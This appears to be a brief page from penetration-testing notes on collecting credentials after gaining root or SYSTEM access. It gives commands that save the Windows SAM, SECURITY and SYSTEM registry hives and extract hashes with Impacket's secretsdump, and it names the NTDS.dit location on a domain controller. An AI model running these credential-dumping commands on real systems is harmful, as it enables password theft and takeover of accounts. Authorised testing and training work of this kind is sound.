Once we are root or NT AUTHORITY\SYSTEM it's time to collect some loot. 🤑🤑🤑


Dump users and passwords

Collect files on target


Then unshadow and crack them.


Dump SAM

Collect files on target

reg save hklm\sam .\sam
reg save hklm\security .\security
reg save hklm\system .\system

Then crack them using Impackets' secretsdump

secretsdump.py -sam sam -security security -system system LOCAL

Dump NTDS (DC)

By default, the Ntds.dit file is located in %SystemRoot%\NTDS\Ntds.dit of a domain controller.

TODO (see /13-misc/impacket.md)

Last updated